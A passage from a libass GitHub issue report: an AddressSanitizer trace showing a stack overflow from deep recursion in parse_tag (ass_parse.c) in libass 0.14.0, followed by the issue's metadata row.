#32 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#33 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#34 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#35 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#36 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#37 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#38 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#39 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#40 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#41 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#42 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#43 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#44 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#45 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#46 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#47 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#48 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#49 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#50 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#51 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#52 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#53 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#54 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#55 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#56 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#57 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#58 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#59 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#60 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#61 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#62 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#63 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#64 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#65 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#66 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#67 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#68 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#69 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#70 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#71 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#72 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#73 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#74 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#75 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#76 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#77 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#78 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#79 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#80 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#81 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#82 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#83 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#84 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#85 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#86 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#87 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#88 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#89 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#90 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#91 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#92 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#93 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#94 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#95 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#96 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#97 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#98 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#99 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#100 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#101 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#102 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#103 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#104 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#105 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#106 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#107 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#108 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#109 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#110 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#111 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#112 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#113 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#114 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#115 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#116 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#117 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#118 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#119 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#120 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#121 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#122 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#123 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#124 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#125 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#126 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#127 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#128 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#129 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#130 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#131 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#132 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#133 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#134 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#135 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#136 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#137 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#138 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#139 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#140 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#141 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#142 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#143 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#144 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#145 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#146 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#147 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#148 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#149 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#150 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#151 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#152 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#153 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#154 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#155 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#156 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#157 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#158 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#159 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#160 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#161 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#162 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#163 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#164 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#165 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#166 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#167 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#168 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#169 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#170 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#171 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#172 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#173 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#174 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#175 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#176 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#177 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#178 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#179 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#180 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#181 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#182 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#183 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#184 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#185 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#186 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#187 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#188 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#189 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#190 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#191 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#192 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#193 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#194 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#195 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#196 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#197 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#198 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#199 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#200 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#201 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#202 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#203 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#204 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#205 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#206 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#207 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#208 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#209 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#210 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#211 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#212 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#213 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#214 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#215 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#216 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#217 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#218 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#219 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#220 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#221 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#222 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#223 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#224 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#225 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#226 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#227 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#228 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#229 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#230 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#231 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#232 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#233 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#234 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#235 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#236 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#237 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#238 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#239 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#240 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#241 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#242 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#243 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#244 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#245 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#246 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#247 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#248 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#249 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#250 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
SUMMARY: AddressSanitizer: stack-overflow /home/test/libass-0.14.0/libass/ass_parse.c:234 in parse_tag
==64283==ABORTING
``` | stack-overflow on ass_parse.c:234 *parse_tag | https://api.github.com/repos/libass/libass/issues/422/comments | 5 | 2020-08-27T02:18:39Z | 2021-04-20T01:05:07Z | https://github.com/libass/libass/issues/422 | 686,885,373 | 422 | 1,770 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.